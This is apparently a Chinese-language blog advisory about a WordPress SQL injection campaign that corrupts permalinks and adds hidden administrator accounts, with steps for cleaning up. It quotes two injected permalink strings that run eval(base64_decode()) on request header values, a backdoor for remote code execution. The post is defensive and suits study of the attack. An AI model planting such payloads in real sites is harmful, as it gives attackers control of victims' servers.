WordPress SQL 注入 – 最新攻击

许多网站都受到最近的 SQL 攻击,其中代码被注入您的网站。这种 MySQL 注入通过使永久链接无效来影响您的永久链接。因此,您的博客文章 URL 将不起作用。许多 WordPress 博客成为这次攻击的目标,感谢Andy Soward让我们注意到这一点。

由于此攻击,以下代码之一被添加到您的永久链接结构中:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

这些引号附加了您网站上的所有永久链接,只有手动删除才能更改。

要解决此问题,请访问:

Settings > Permalinks 并删除上述代码并替换您的默认代码。

您需要做的下一件事是转到用户。您将看到有多个管理员。你不会看到他们的名字被列出,但你会看到数量增加了。所以你需要做的是查看所有用户并找到最后一个注册的用户。将鼠标放在该用户上并获取链接。通过将 1 添加到该数字来更改代码 userid=。因此,如果您可以看到的最后一个用户是用户 #2,则将其添加 1 并使其变为 3。您应该会发现隐藏的管理员有一个奇怪的代码作为名字。删除代码并让他成为订阅者。然后返回并删除他。

这应该可以解决问题。您也可以通过简单地转到您的 PHPMyAdmin 来删除他。因为你会在那里看到用户。

我们只是想尽快发布此消息,以便更新我们的用户。请确保您检查您的博客没有被感染。我们希望 WordPress 尽快发布。

此外,如果您还没有实施其中一些措施来保护您的WordPress 管理区域。